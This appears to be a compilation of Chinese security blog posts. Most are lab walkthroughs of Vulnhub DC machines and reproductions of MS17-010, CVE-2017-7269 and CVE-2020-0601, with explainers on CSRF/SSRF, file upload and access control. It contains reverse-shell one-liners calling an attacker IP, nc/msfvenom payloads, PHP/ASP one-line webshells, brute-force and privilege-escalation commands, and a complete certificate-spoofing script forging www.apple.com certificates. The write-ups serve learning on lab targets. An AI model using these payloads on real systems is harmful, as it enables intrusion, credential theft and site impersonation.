Vulnhub靶场之DC-7 这周开始上课了，没法每日更新了，只能周末抽时间发，，，那么进入正题老规矩先搜索主机的地址arp-scan -l用nmap扫描端口和信息nmap -sS -A -p 1-65535 192.168.75.140开启了80端口，访问一下看看emmm，为啥这么熟悉，。，。使用之前的方法攻击Drupal，用msf测试失败。。。。总觉得哪里和原先的不一样？？？？挂上SSR去谷歌搜一波看看！！！配置文件？账号密码？能不能登录后台？SSH呢，奇怪的操作增加了WTF奇怪的操作果然增加了查看当前目录下的文件，backups里面有两个加密文件，不可利用，查看mbox文件，发现是一个计划任务：自动备份数据库的执行情况，调用的脚本是/opt/scripts/backups.sh，是root权限执行的。看看权限和内容drush和gpg是什么东西？其中drush是专门用来管理Drupal站点的shell，可以用来修改密码可以修改admin账号的密码，这里要进入/var/www/html目录下才有权限执行该命令，这里修改密码为123465，提示success即修改密码成功。登录成功在Content中新建一个Basic page，然后在Title输入页面的名称，在Body中放入反弹shell的PHP代码，Text format的位置选择PHP code。但是从下图中可以看到Text format里面没有PHP code选项。这些都弄好了之后，在kali上监听端口，最后点击Preview按钮。不过这个貌似被移除了可以通过手动安装。选择URL并点击installURL：https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz随后在Content中添加webshell.php，点击Content > Add content > Basic page，先将Text format修改为PHP code，再写入反弹shell可以直接msfvenom生成一个反弹shell代码msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.75.129 LPORT=4444 R > DC7_shell.php复制反弹shell代码到Body里，Title自定义，完了之后放着别动，先使用metasploit监听端口，然后点击Previewmsfconsole use exploit/multi/handler set lhost 192.168.75.129 set lport 4444 set payload php/meterpreter/reverse_tcp run点击Preview后反弹成功，接着进入交互shellshell python -c "import pty;pty.spawn('/bin/bash')"我们使用Drupal反弹回来的shell用户是www-data，所以接下来就是将反弹shell的代码附加到backups.sh脚本中（因为计划任务是root权限执行的，反弹回来的shell也会是root用户）echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.75.129 1234 >/tmp/f" >> backups.sh 然后在kali中监听相应端口，等待计划任务的执行，执行后便获得rootshell，接着进入交互shellnc -lvnp 1234 shell python -c "import pty;pty.spawn('/bin/bash')" 拿下flag

Vulnhub靶场之DC-5 还是老规矩，先搜集一波信息arp-scan -l 检索一下我们的主机设备192.168.75.138使用nmap扫描端口信息 nmap -sS -p 1-65535 -A 192.168.75.138发现启用了nginx服务，开启着80端口。访问试试似乎是一个介绍页面，还有一个留言板发现存在index.php，solutions.php，about-us.php，faq.php，contact.php，thankyou.php，footer.php七个页面]使用kali下的自带字典因为我用的是Community版本的burp。。。。爆破没法设置线程巨慢，因此盗几张图既然是文件包含，直接老规矩去读取/etc/passwdthankyou.php?file=/etc/passwd对方使用的是Nginx，那么能不能读取出nginx的日志文件呢。查询资料得出，默认nginx的日志路径是/var/log/nginx/*.log如果说他将会读取日志。那么能否在日志里面插入一句话木马呢？插入成功上菜刀连接http://192.168.75.138/thankyou.php?file=/var/log/nginx/error.log试试看成功不出所料，又是一个低权用户那么用nc反弹到kali里面玩nc -e /bin/bash 192.168.75.129 1234nc -lvvp 1234然后我们寻找具有sudo权限的操作find / -perm -u=s -type f 2>/dev/nullscreen提权？searchsploit screen 4.5.0查找可用于screen 4.5.0的漏洞脚本文件cp /usr/share/exploitdb/exploits/linux/local/41152.txt 41152.textcp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh将41154.sh中上面一部分c语言代码另存为libhax.c 编译libhax.c文件gcc -fPIC -shared -ldl -o libhax.so libhax.c将41154.sh中下面一部分c语言代码另存为rootshell.c 编译rootshell.c文件gcc -o rootshell rootshell.c将41154.sh中剩下部分代码另存为dc5.sh脚本文件并在保存dc5.sh文件输入 :set ff=unix ，否则在执行脚本文件时后出错为dc5.sh增加可执行权限，执行dc5.sh文件，成功获取到root权限cd /tmpchmod +x dc5.shls -l./dc5.sh

Vulnhub靶场之DC-4 AIS 开头先解释一下为啥没有DC-3DC3的虚拟机安装完后，设备无法联网，内网无法被发现，因此跳过。老规矩，先查一下目标地址192.168.75.137使用nmap对目标进行扫描nmap -sS -p 1-65535 -A 192.168.75.137开启了80.22端口，直接访问80端口，看看是何方神圣还是老规矩，上Hydra大杀器hydra爆破密码： hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.75.137 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F如果你出现这种情况请进入/usr/share/wordlists/路径下kali自带的密码字典rockyou.txt.gz进行解压：gzip -d rockyou.txt.gz登录成功用burp抓包查看nc反弹shell： nc -e /bin/sh 192.168.75.129 4444发现三个账户jim的账户中有密码文件爆破猜解ssh密码，与账户 hydra -L dc4.txt -P passwd.txt -t 6 ssh://192.168.75.131登录进去。看起来好像是有一个邮件的意思噗，密码都出来了登录上去尝试sudo -l 提权，出现提示，使用teehee更改权限，并提权为root

Vulnhub靶场之DC-2 WordPress 环境：kali：192.168.75.129              DC2 -靶机 和 kali 在同一C段先是arp-scan -l检索局域网内主机发现靶机地址，使用nmap进行扫描 nmap -A -p 1-65535 192.168.75.136发现打开了80端口，SSH端口那么直接访问80看看有没有什么神奇的东西还跳转了，上hosts重定向。win10路径： C:\Windows\System32\drivers\etclinux路径：/etc/hosts 访问成功，发现flag1使用工具 cewl爬取生成密码cewl http://dc-2/ -w passwd.txt准备使用wpscan进行搞事情，但我。。上hydra大杀器吧，修是不可能修的，，，WordPress默认后台地址：/wp-admin 且WordPress当用户名不存在时会提示用户不存在，可增加爆破效率hydra -L user.txt -P passwd.txt dc-2 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'我们跑出了 jerry和tom账户，登进去看看tom，没啥东西，jerry用户界面如下，发现了flag2啊哈想到上一个DC1的靶机是用SSH干进去的问题是，WordPress的CMS本身还是比较安全的，问题基本都出在插件上，可这个jerry的账号权限不够，无法安装插件来上传shell那就硬着头皮ssh试试看，用登录账号密码试试jerry老贼不是同一个密码，太草（一种植物）蛋了试试看Tom老贼不愧是你。。。。执行命令发现 command not found，百度得知这是因为ssh远程连接到服务器的环境变量中不包含对应可执行文件的路径。需要自行添加BASH_CMDS[a]=/bin/sh;a $ /bin/bash export PATH=$PATH:/bin/ export PATH=$PATH:/usr/bin得到flag3切换到Jerry，发现flag4.txt哈？Git还能提权？试试看吧。看看git有没有那个权限 sudo -lflag不会骗人（小声bb）sudo git -p help !/bin/sh奇怪，我怎么没法提权，查了查百度，发现git有一个缓冲区溢出漏洞，在使用sudo git -p --help时，不需要输入root密码即可以root权限执行这条命令。我们尽量减小缓冲区的行数，使其一次性显示不完这条命令的回显结果，这样这条命令就一直处于运行状态，加上此时处于root权限，我们直接在这时候打开bash shell，直接提权至root。看起来要打开gui了，来自Xshell的鄙，艹（一种植物）奇怪的知识增加了

Vulnhub靶场之DC-1 Drupal 今天来进行CTF的小测试题，DC靶场1，难度不高，最适合我这种萌小新了。安装上ova虚拟包，看看访问正常不正常正常，上nmap扫描一下端口回到网站，查看robots.txt，看看有没有什么有用的信息比我还白，，，似乎是有一个古老的漏洞CVE，拿MSF打一下看看，搜索drupal开干，获取相应。然后Getshell这是撒？，这奇妙的名字，读取一波看看通过百度可知drupal的数据库配置文件在/sites/default/settings.php真是有趣，爆破、、、远程连接暂时不得动。不如来查看etc/passwdemmmmm这是啥啊？根据flag2提示暴力破解flag4账户密码，利用自带的medusa+John the Rippermedusa -M ssh -h 192.168.75.135 -u flag4 -P /usr/share/john/password.lst -e ns -F -M: 表示你要破解的类型。-h：目标机器地址。-u：用户名。-e : 尝试空密码。-F：破解成功后立即停止破解。-v：显示破解过程。very nice 但是确定是让我爆破？ssh连接目标emmmm。不是root玩毛线要想有root权限：1 以root账户登录(尝试使用爆破未果）2 普通用户登录，查找具有suid权限位的命令去get shellsuid权限位：说明可以以root权限执行命令可我这种垃圾怎么会提权，呜呜呜find / -type f -perm -u=s 2>/dev/nullfind / -type f -name shell -exec "whoami" \;我也不知道为什么要用find 哈哈哈这这这。。。root权限？find / -type f -name shell -exec "/bin/sh" \;跑一波sh试试搞定。。。

CSRF与SSRF CSRF又称跨站请求伪造，XSS就是CSRF中的一种。二者区别，XSS利用的是用户对指定网站的信任，CSRF利用是网站对用户浏览器的信任。发生条件当用户在安全网站A登录后保持登录的状态，并在此时浏览了保存有恶意代码的另一个网站B。此时B站劫持用户的浏览器并以用户以登录的状态对A站发送非用户本人的操作。当服务端没有对这次请求验证的情况下，将这次操作作为可信任的用户的操作。发生地点攻击者可以将恶意网址或者代码藏在论坛博客等任何用户生成内容的网站中。这意味着如果服务端没有适合的防御措施的话，用户即使访问熟悉的可信网站也有受攻击的危险。类似于XSS一些html标签可以发送HTTP GET类型请求 像,浏览器渲染img标签的时候，并不知道标签中src属性的值，是否为一个图片，浏览器发起一个HTTP GET请求，并携带当前受害者当前浏览器在网站的cookie，获取返回结果。对于很多网站来说，即使是一些重要的操作使用POST来提交请求，但是服务器再接收请求的时候并没有严格区分POST和GET。在PHP中滥用$_REQUEST就是例子。如果服务端已经区分了GET,POST只用POST请求数据，可以通过制造一个隐藏的表单，并通过js代码自动提交伪造的表单。要我说的话，和XSS有一部分类似防御增加验证码机制，增加带有大量噪点的验证码，杜绝代码能够识别的简单验证码，当然了也经常被绕过验证referer,采用同源政策，referer记录着数据包的来源地址，来判断请求的合法性，但是这个可以伪造使用Token，令牌是一种将表单value的加密算法生成不同的加密结果，在服务器端进行验证。在访问登录过一个网站，点击退出账户。SSRF又名服务端请求伪造攻击有的大型网站在web应用上提供了从其他服务器获取数据的功能。使用户指定的URL web应用获取图片，下载文件，读取文件内容。攻击者利用有缺陷的web应用作为代理攻击远程和内网的服务器（跳板）危害：可对外网，服务器所在内网，受控服务器进行端口扫描，获取一些banner对内网web应用进行指纹识别，通过访问默认文件实现攻击内外网web应用，主要是使用get参数就可以实现分攻击利用file协议读取本地文件该漏洞存在的条件是对curl函数的滥用比如：if(isset($_POST['commit'])){ $link = $_POST['url']; $filename = './curled/'.rand().'txt'; $curlobj = curl_init($link); //初始化连接 $fp = fopen($filename,"w"); curl_setopt($curlobj, CURLOPT_FILE, $fp); //设置输出文件，默认为STDOUT (浏览器)。 curl_setopt($curlobj, CURLOPT_HEADER, 0); //设置为0表示不返回HTTP头部信息。 curl_exec($curlobj); //执行curl请求 curl_close($curlobj); //关闭curl连接 fclose($fp); $fp = fopen($filename,"r"); $result = fread($fp, filesize($filename)); fclose($fp); //关闭文件 echo $result; }并为对输入的命令进行过滤，导致服务器遭到攻击修复方案：过滤返回信息，如果web应用数去获取某一类型文件，在把结果返回给用户之前先验证信息是否符合标准。例如：当攻击者利用"识别图片"下的该漏洞远程包含一个文件，可以通过在服务器上验证返回数据是否是纯像素，来进行过滤。统一错误页限制请求端口为http常用端口 80,443,8080,8090内网IP黑名单，避免应用被用来获取内网数据，攻击内网

ms17010上古漏洞复现 懵逼吗，突然复现一个上古的漏洞。没办法，今天忙着给站加功能了，只能水一篇了。再加上在某“大黑客群”发现一个还在耍这个洞的“大哥”。特此水下此文。0x01 实验环境攻击机：kali linuxip:192.168.75.129目标机：windows 7ip:192.168.75.133为了确保复现成功，先把360大爷和防火墙大哥关掉先然后看看445小老弟是不是在村门口了0x02 配置exploit老规矩，先进msfconsolemsf > use exploit/windows/smb/ms17_010_eternalbluemsf exploit(ms17_010_eternalblue) > set rhost 192.168.75.133rhost => 192.168.75.133查看选项msf exploit(ms17_010_eternalblue) > show options设置目标机的IP，其他选项默认就可以；注意：选项中说明了此exploit对应的目标系统，所以并不是具有该漏洞的系统都能利用此exploit；0x03 配置payloadpayload只需要配置监听返回会话的IP；msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcppayload => windows/x64/meterpreter/reverse_tcpmsf exploit(ms17_010_eternalblue) > set lhost 192.168.75.129lhost => 192.168.75.1290x04 开始攻击警告：攻击过程可能导致目标系统宕机重启，谨慎操作！msf exploit(ms17_010_eternalblue) > exploit成功获得session。shell 进入主机操作

文件上传漏洞 文件上传漏洞文件上传漏洞是指由于程序员未对上传的文件进行严格的验证和过滤，而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马，病毒，恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的，“文件上传”本身没有问题，有问题的是文件上传后，服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全，则会导致严重的后果。在了解文件上传漏洞之前先了解什么是Web容器、IIS、文件解析。什么是web容器？web容器是一种服务程序，在服务器一个端口就有一个提供相应服务的程序，而这个程序就是处理从客户端发出的请求，如tomcat、apache、nginx等等。（可以理解为给编程语言提供环境）中间件：提供系统软件和应用软件之间连接的软件，以便于软件各部件之间的沟通。中间件处在操作系统和更高一级应用程序之间。容器*：给处于其中的应用程序组件（ASP,JSP,PHP）提供一个环境。使处于其中的应用程序组件之间跟容器中的环境变量接口交互，不必关注其他系统问题。服务器：www服务器或http服务器。提供web信息游览服务。它只需支持http协议、html文档格式以及url，向游览器提供服务的程序。什么是IIS?IIS全称是互联网信息服务，包括FTP/FTPS、NNTP、HTTP/HTTPS、SMTP等服务。.net Framework是基础类库，是程序运行的底层框架。IIS是架设Web服务器用来提供网页游览服务的，属于系统环境。一般用ASP.NET开发软件，然后靠IIS对公网提供服务。什么是文件解析？当服务器接收到一个HTTP请求的时候，IIS首先需要决定如何去处理这个请求（服务器处理.aspx和.html肯定是不一样的），根据的是文件的后缀名。服务器获取所请求的页面（也可以是文件）的后缀名后接下来会在服务器端寻找可以处理这类后缀名的应用程序，如果IIS找不到可以处理此类文件的应用程序，那么IIS将直接把这个文件返还给客户端。1 解析漏洞攻击者在利用上传漏洞时，通常会与Web容器的解析漏洞配合在一起。所以我们首先来了解一下解析漏洞，这样才能更深入地了解上传漏洞，并加以防范。常见的Web容器有ⅡS、Apache、Nginx、Tomcat等，下面主要讲IIS、Apache容器。1.1 IIS解析漏洞IIS 6.0在解析文件时存在以下两个解析漏洞。当建立*.asa、*.asp格式的文件夹时，其目录下的任意文件都将被IIS当做asp文件来解析。 例如：建立文件夹parsing.asp，在parsing.asp文件夹内新建一个文本文档test.txt，其内容为<%=NOW()%>，然后在浏览器内访问。 “NOWO”是ASP提供获取当前时间的函数，TXT是文本文档格式，IIS是不会去解析此类文件的，应该会直接显示其内容，而在parsing.asp文件夹中，却被当作ASP脚本来解析。 当文件为*.asp;1.jpg时，IIS6.0同样会以ASP脚本来执行，如：新建文件test.asp;1.jpg，内容为<%=NOW()%>。1.2 Apache解析漏洞Apache是从右到左开始判断解析，如果为不可识别解析，就再往左判断，如xxx.php.owf.rar ，”.owf”和”.rar”这两种后缀是apache解析不了的，apache就会把xxx.php.owf.rar解析成php。怎么去判断是不是合法的后缀就是这个漏洞利用关键，测试时把常见的后缀都写上，去测试是不是合法，任意不识别的后缀，逐级向上识别。有些程序开发人员在上传文件时，判断文件名是否是PHP、ASP、ASPX、ASA、CER、ASPX等脚本扩展名，如果是，则不允许上传，这时攻击者就有可能上传1.php.rar等扩展名来绕过程序检测，并配合解析漏洞，获取到WebShell。2 绕过上传漏洞绕过上传漏洞分以下两种。客户端检测：客户端使用JavaScript检测，在文件未上传时，就对文件进行验证；服务器端检测：服务端脚本一般会检测文件的MIME类型，检测文件扩展名是否合法，甚至有些程序员检测文件中是否嵌入恶意代码。在研究上传漏洞之前，首先来看两个小工具：中国菜刀和一句话图片木马。“中国菜刀”这款软件是用来管理网站文件的，非常小巧灵活，它仅仅需要一段简短的代码就可以方便地管理网站。中国菜刀现在已经成为安全研究者手中必备的利器，其官方网站为：http://www.maicaidao.com。该软件提供的服务器端文件仅有一行代码。目前支持的服务器端脚本包括：PHP、ASP、ASP.NET、JSP等，并且支持HTTPS安全连接的网站。常见的代码如下：Asp一句话：<%eval request(“xxx”)%>Php 一句话：<%php @eval($_POST[xxx]);?>Aspx一句话：<%@ Page Languag=”xxx”%><%eval(Request.Item[“xxx”])%>正因为代码短小精悍，所以被黑客称为一句话木马（一句话后门）。将<？php @eval（S_POST['xxx']);?>保存为shell.php，上传至PHP主机空间中，配置菜刀进行连接。IIS6.0的解析漏洞触发条件：必须是IIS6.0的环境文件名漏洞 正常命名：as.jpg触发漏洞的命名方式：as.asp;.jpghttp://192.168.16.128/as.jpg 打开是一张正常的图片。http://192.168.16.128/as.asp;.jpg 打开已经被解析成asp的源码了。文件夹名漏洞 正常命名：a/as.jpg触发解析漏洞的命名：a.asp/as.jpghttp://192.168.16.128/a/as.jpg 打开是一张正常的图片。http://192.168.16.128/a.asp/as.jpg 同样，打开已经被解析成asp的源码了。二、IIS7.0、IIS7.5 以及Nginx<8.03 解析漏洞IIS7.0和IIS7.5的解析漏洞没有IIS6.0那样全面，有时候或许没效果。还有一点需要注意：IIS7.0、IIS7.5这种解析漏洞只适用于PHP编程语言的网站；不像IIS6.0的解析漏洞，ASP和PHP都可以。正常的命名：a.jpg触发解析漏洞的命名：a.jpg/.phpwww.*.com/upload/20190622/aa0j4si01j741b2ugpgbgc8t4a. jpg 打开是一张正常的图片。www.*.com/upload/20190622/aa0j4si01j741b2ugpgbgc8t4a. jpg/.php 同样，打开已经被解析成PHP的源码了。试想一下，如果这个图片是我的PHP一句话木马呢？是不是说明这个PHP一句话木马已经被解析了。接下来，我们用中国菜刀或中国蚁剑连接就可以轻松获取到webshell了。三、Apache解析漏洞apache解析很奇怪，它解析是按照向左解析法来的，虽然说，到目前为止，我还暂时没有碰到过有这种漏洞的网站。向左解析法：a.jpg.asp.gif.xxx大概意思是，当Apache碰到 .xxx 不认识的时候，它会向左移找下一个，继续解析 .gif，这里就会以 .gif 来解析后面依次类推主。a.php.xxx 解析成a.phpb.php.xxx 解析成b.php四、空格 和 . 绕过上传限制空格和点在Windows系统下会自己忽略掉。a.asp 去绕过对上传的限制a.asp. 去绕过上传限制五、绕过上传的方法之00截断00截断就是指用%00；a.asp%00.jpg 就会变成a.asp，后面的.jpg就会被%00截断了。

水平越权与垂直越权 越权访问漏洞越权访问（Broken Access Control，简称BAC）是Web应用程序中一种常见的漏洞，由于其存在范围广、危害大，被OWASP列为Web应用十大安全隐患的第二名。该漏洞是指应用在检查授权时存在纰漏，使得攻击者在获得低权限用户账户后，利用一些方式绕过权限检查，访问或者操作其他用户或者更高权限。越权漏洞的成因主要是因为开发人员在对数据进行增、删、改、查询时对客户端请求的数据过分相信而遗漏了权限的判定。越权访问漏洞主要分为水平越权访问和垂直越权访问。水平越权访问漏洞水平越权访问是一种“基于数据的访问控制”设计缺陷引起的漏洞。由于服务器端在接收到请求数据进行操作时没有判断数据的所属人/所属部门而导致的越权数据访问漏洞。 假设用户A和用户B属于同一角色，拥有相同的权限等级，他们能获取自己的私有数据（数据A和数据B），但如果系统只验证了能访问数据的角色，而没有对数据做细分或者校验，导致用户A能访问到用户B的数据（数据B），那么用户A访问数据B的这种行为就叫做水平越权访问。垂直越权访问漏洞垂直越权是一种“基于URL的访问控制”设计缺陷引起的漏洞，又叫做权限提升攻击。由于后台应用没有做权限控制，或仅仅在菜单、按钮上做了权限控制，导致恶意用户只要猜测其他管理页面的URL或者敏感的参数信息，就可以访问或控制其他角色拥有的数据或页面，达到权限提升的目的。防范措施前后端同时对用户输入信息进行校验，双重验证机制 调用功能前验证用户是否有权限调用相关功能 执行关键操作前必须验证用户身份，验证用户是否具备操作数据的权限 直接对象引用的加密资源ID，防止攻击者枚举ID，敏感数据特殊化处理 永远不要相信来自用户的输入，对于可控参数进行严格的检查与过滤

CVE-2020-0601漏洞复现与分析 第一步：生成https证书基于GitHub原作者的python脚本我修改了一些证书信息，运行下面这个python脚本将生成 www.apple.com.cn和 www.apple.com 域名的https证书。#!/usr/bin/env python3 import datetime import hashlib import os import subprocess import sys from typing import BinaryIO, Iterable, Optional, Sequence, Tuple import ecdsa.curves import ecdsa.ellipticcurve import ecdsa.numbertheory import ecdsa.util from asn1crypto import core, keys, pem, x509 def load_certificate_chain(filename: str) -> Iterable[x509.Certificate]: with open( os.path.join(os.path.dirname(os.path.abspath(__file__)), filename), "rb" ) as f: pem_bytes = f.read() for object_type, _, der_bytes in pem.unarmor(pem_bytes, multiple=True): if object_type != "CERTIFICATE": continue yield x509.Certificate.load(der_bytes) def generate_ec_private_key(name: str) -> keys.ECPrivateKey: der_bytes = subprocess.check_output( ( "openssl", "ecparam", "-name", name, "-param_enc", "explicit", "-genkey", "-noout", "-outform", "DER", ) ) return keys.ECPrivateKey.load(der_bytes) def get_exploit_generator( k: int, Qx: int, Qy: int, curve: ecdsa.curves.Curve ) -> Tuple[int, int]: k_inverse = ecdsa.numbertheory.inverse_mod(k, curve.order) Q = ecdsa.ellipticcurve.Point(curve.curve, Qx, Qy, curve.order) G = Q * k_inverse return (G.x(), G.y()) def curve_from_ec_parameters(parameters: keys.SpecifiedECDomain) -> ecdsa.curves.Curve: p = parameters["field_id"]["parameters"].native a = parameters["curve"]["a"].cast(core.IntegerOctetString).native b = parameters["curve"]["b"].cast(core.IntegerOctetString).native Gx, Gy = parameters["base"].to_coords() order = parameters["order"].native curve_fp = ecdsa.ellipticcurve.CurveFp(p, a, b) G = ecdsa.ellipticcurve.Point(curve_fp, Gx, Gy, order) return ecdsa.curves.Curve(None, curve_fp, G, (0, 0)) def digest_certificate(certificate: x509.Certificate) -> bytes: der_bytes = certificate["tbs_certificate"].dump() return hashlib.new(certificate.hash_algo, der_bytes).digest() def sign_certificate( signing_key: ecdsa.keys.SigningKey, certificate: x509.Certificate ) -> None: digest = digest_certificate(certificate) signature_bytes = signing_key.sign_digest( digest, sigencode=ecdsa.util.sigencode_der ) certificate["signature_value"] = signature_bytes def exploit_certificate( certificate: x509.Certificate, ) -> Tuple[ecdsa.keys.SigningKey, keys.ECPrivateKey]: curve_name = certificate.public_key["algorithm"]["parameters"].chosen.native ec_private_key = generate_ec_private_key(curve_name) k = ec_private_key["private_key"].native parameters = ec_private_key["parameters"].chosen nist_curve = curve_from_ec_parameters(parameters) Qx, Qy = certificate.public_key["public_key"].to_coords() Gx, Gy = get_exploit_generator(k, Qx, Qy, nist_curve) parameters["base"] = keys.ECPoint.from_coords(Gx, Gy) ec_private_key["parameters"] = parameters ec_private_key["public_key"] = certificate.public_key["public_key"] certificate.public_key["algorithm"]["parameters"] = parameters exploit_curve = curve_from_ec_parameters(parameters) signing_key = ecdsa.keys.SigningKey.from_secret_exponent(k, curve=exploit_curve) signed_digest_algorithm = x509.SignedDigestAlgorithm({"algorithm": "sha256_ecdsa"}) certificate["tbs_certificate"]["signature"] = signed_digest_algorithm certificate["signature_algorithm"] = signed_digest_algorithm sign_certificate(signing_key, certificate) return (signing_key, ec_private_key) def write_pem(f: BinaryIO, value: core.Asn1Value, object_type: str) -> None: print("Writing {} to {!r}".format(object_type, f.name), file=sys.stderr) der_bytes = value.dump() pem_bytes = pem.armor(object_type, der_bytes) f.write(pem_bytes) def generate_private_key( algorithm: str, ) -> Tuple[keys.PrivateKeyInfo, keys.PublicKeyInfo]: pem_bytes = subprocess.check_output( ( "openssl", "req", "-pubkey", "-noout", "-newkey", algorithm, "-keyout", "-", "-nodes", "-batch", "-outform", "PEM", ) ) pem_iter = pem.unarmor(pem_bytes, multiple=True) object_type, _, der_bytes = next(pem_iter) assert object_type == "PRIVATE KEY" private_key = keys.PrivateKeyInfo.load(der_bytes) object_type, _, der_bytes = next(pem_iter) assert object_type == "PUBLIC KEY" public_key = keys.PublicKeyInfo.load(der_bytes) return private_key, public_key def random_serial_number() -> int: return int.from_bytes(os.urandom(20), "big") >> 1 def write_tls_certificate( ca_cert: x509.Certificate, ca_cert_orig: x509.Certificate, signing_key: ecdsa.keys.SigningKey, name: str, subject: x509.Name, subject_alt_names: Sequence[str], ) -> None: private_key, public_key = generate_private_key("rsa:4096") signed_digest_algorithm = x509.SignedDigestAlgorithm({"algorithm": "sha256_ecdsa"}) certificate = x509.Certificate( { "tbs_certificate": { "version": "v3", "serial_number": random_serial_number(), "signature": signed_digest_algorithm, "issuer": ca_cert_orig.subject, "validity": { "not_before": x509.UTCTime( datetime.datetime(2019, 10, 24, tzinfo=datetime.timezone.utc) ), "not_after": x509.UTCTime( datetime.datetime(2020, 10, 23, tzinfo=datetime.timezone.utc) ), }, "subject": subject, "subject_public_key_info": public_key, "extensions": [ { "extn_id": "basic_constraints", "critical": True, "extn_value": {"ca": False}, }, { "extn_id": "subject_alt_name", "critical": False, "extn_value": [ x509.GeneralName({"dns_name": dns_name}) for dns_name in subject_alt_names ], }, { "extn_id": "certificate_policies", "critical": False, "extn_value": [ {"policy_identifier": "1.3.6.1.4.1.6449.1.2.1.5.1"}, ], }, ], }, "signature_algorithm": signed_digest_algorithm, } ) sign_certificate(signing_key, certificate) with open(name + ".crt", "wb") as f: write_pem(f, certificate, "CERTIFICATE") write_pem(f, ca_cert_orig, "CERTIFICATE") write_pem(f, ca_cert, "CERTIFICATE") with open(name + ".key", "wb") as f: write_pem(f, private_key, "PRIVATE KEY") write_pem(f, certificate, "CERTIFICATE") write_pem(f, ca_cert_orig, "CERTIFICATE") write_pem(f, ca_cert, "CERTIFICATE") def get_name(purpose: Optional[str] = None) -> str: components = ["www.apple.com", "aaaa"] if purpose: components.insert(1, purpose) return " ".join(components) def main() -> None: _, ca_cert, _ = load_certificate_chain( "comodoecccertificationauthority-ev-comodoca-com-chain.pem" ) ca_cert_orig = ca_cert.copy() signing_key, ec_private_key = exploit_certificate(ca_cert) with open("intermediateCA.crt", "wb") as f: write_pem(f, ca_cert_orig, "CERTIFICATE") write_pem(f, ca_cert, "CERTIFICATE") with open("intermediateCA.key", "wb") as f: write_pem(f, ec_private_key, "EC PRIVATE KEY") write_tls_certificate( ca_cert, ca_cert_orig, signing_key, "www.apple.com", x509.Name.build( { "incorporation_country": "US", "business_category": "California", "serial_number": "C0805582", "country_name": "US", "common_name": "www.apple.com", "organization_name": "Apple Inc.", "organizational_unit_name": "Internet Services for Akamai", } ), ("www.apple.com.cn", "www.apple.com"), ) if __name__ == "__main__": main()第二步：部署https网站将生成的https证书（www.apple.com.crt）和私钥文件（www.apple.com.key）部署到Nginx上，并启动Nginx。第三步：修改hosts文件在hosts文件中添加 www.apple.com 域名的解析记录，将 www.apple.com 解析到本地服务器。第四步：访问www.apple.com网站Edge浏览器访问假网站：IE浏览器访问假网站不过，火狐大法就不管用了0x02 椭圆曲线数字签名算法（ECDSA）在2009年修订的FIPS 186加入了基于椭圆曲线密码的数字签名方法，称其为椭圆曲线数字签名算法（ECDSA）。由于椭圆曲线密码效率方面的优势，ECDSA的应用越来越广泛。ECDSA算法过程如下：参与数字签名的所有方都使用相同的全局域参数，用于定义椭圆曲线以及曲线上的基点。签名者首先需要生成一对公钥、私钥。签名者可以选择一个随机数作为私钥，使用随机数和基点，可以计算椭圆曲线上的另一个解点，作为公钥。对于待签名的消息计算其Hash值。签名者使用私钥、全局域参数、Hash值产生签名，包括两个整数r和s。验证者使用签名者的公钥、全局域参数、整数s作为输入，计算v，并与r比较。如果两者相等，则签名通过。0x03 漏洞原理通常，签名者产生一对公私钥后，要去证书中心（certificate authority，简称CA），为公钥做认证，以此来证明签名者本身身份。证书中心用自己的私钥，对签名者的公钥和一些相关信息一起做签名，生成数字证书（Digital Certificate）。由补丁分析部分可知，微软在对数字签名做合法校验时，支持椭圆曲线参数的自定义输入，又只对公钥信息做校验，存在严重缺陷。攻击者可以传入自定义的全局域参数、签名信息s，只需要公钥信息与系统ECC根证书Microsoft ECC Product Root Certificate Authority 2018的公钥保持一致，就可以绕过校验逻辑，让数字签名信息看起来就是ECC根证书签发的一样。而这，是很容易做到的。假设ECC根证书的私钥是d(对攻击者未知)，基点是G，公钥是Q=dG。攻击者可以选择跟ECC根证书一样的椭圆曲线，只需d’=1(单位元)，G‘=Q，则Q‘=d’G’=Q，从而完成攻击。

iis6.0远程代码执行漏洞复现(CVE-2017-7269) 一.实验环境搭建1.目标机:windows server 2003 r2需要目标服务器开启WebDAV靶机IP：192.168.75.134Kali IP ： 192.168.75.129kali中启动Msf，使用CVE-2017-7269攻击插件use exploit/windows/iis/cve_2017_7269没有这个插件的老铁，还麻烦您 在https://github.com/zcgonvh/cve-2017-7269 下载脚本，并且 把exp 复制到攻击机器的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下，然后reload_all进行启用使用show options查看相关攻击参数set RHOSTS 192.168.75.134set HttpHost 192.168.75.134设置返回载荷set payload windows/meterpreter/reverse_tcp使用exploit 或者run进行攻击获取到连接输入shell命令，来到了我们所熟悉的界面查看当前用户权限,whoami普通权限，但是可以通过msf的上传功能传递木马或者提权脚本

web容器漏洞 IIS文件解析漏洞1.初始思路：如果网站禁止上传asp文件我们就上传iis可以解析的cer和asa文件 2.iis6.0:会解析此两类文件：/test.asp/test.jpg test.asp;.jpg 3.iis7.5:解析此类情况：test.jpg/.php 条件：php配置文件开启cgi.fix.pathinfo（php.ini） 4.apache：apache重要文件时在/etc/mime.types文件中写入了可以解析哪些文件和mime类型 解析是由于apache特性从右向左解析。当apache添加addhandle application/x-httpd-php.php 就可以解析php文件。修复是用sethandle然后加正则匹配 5.nginx：解析test.jpg/.php文件，低版本的可以%00.PHP进行解析攻击 同样和apache一样是通过mime.types来识别文件 也是当cgi.fix.pathinfo=1时开启文件修理路径修理功能 在www.conf中加入security.limit_extensions= 没有指定特定格式就可以解析php命令执行漏洞1.iis6.0：命令执行漏洞编号CVE-2017-7269。 在开启webdav服务的情况下可远程执行漏洞 原理：iis6.0处理PROPFIND指令对url的长度没有检查和控制，导致memcpy对虚拟路径执行引发栈溢出。目录遍历1.nginx：目录遍历与apache一样同样是配置错误 开启：/etc/nginx/sites-available/default中的location中加入autoindex 